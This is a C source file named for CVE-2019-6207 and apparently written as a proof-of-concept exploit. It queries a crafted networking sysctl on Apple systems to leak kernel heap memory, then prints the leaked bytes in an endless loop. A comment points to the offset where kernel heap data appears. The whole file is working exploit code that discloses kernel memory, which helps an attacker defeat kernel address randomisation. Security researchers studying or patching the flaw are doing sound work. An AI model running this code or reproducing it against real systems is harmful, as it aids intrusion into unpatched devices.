CVE-2019-6207.c

//
//  main.c
//  rt_msghdr2_heapleak
//
//  Created by maldiohead on 2018/12/28.
//  Copyright © 2018 maldiohead. All rights reserved.
//


#include <sys/socket.h>
#include<sys/sysctl.h>

#include <sys/syscall.h>
#include <ctype.h>
#include <stdio.h>
#include <unistd.h>

int main(int argc, const char * argv[]) {
    // insert code here...
    
    int mib[6], maxproc;
    size_t len;
    
    mib[0] = CTL_NET;
    mib[1] = 0x11;
    mib[2]=0;
    mib[3]=0x1e;
    mib[4]=2;
    mib[5]=2;


    sysctl(mib, 6,  NULL, &len, NULL, 0);
    if(!len)
    {
        printf("[*]failed get len!\n");
        return 0;
    }
    uint8_t* buf=malloc(len);
    if(!buf)
    {
        printf("[*]failed alloc memory!\n");
        return 0;
    }
    
    // note: the leaked kernel  heap info at offset 0x20 size 4 bytes
    printf("[*]buffer addr:0x%lx length 0x%x\n",buf,len);
    while(1){
        sysctl(mib, 6,  buf, &len, NULL, 0);
        printf("[*]show leaked data:");
        for(int i=0;i<len;i++)
        {
            if( i%0x10==0)
                printf("\n");
            printf("%0.2x ",buf[i]);
    
        }
        printf("\n");
        sleep(1);
    }
    return 0;
}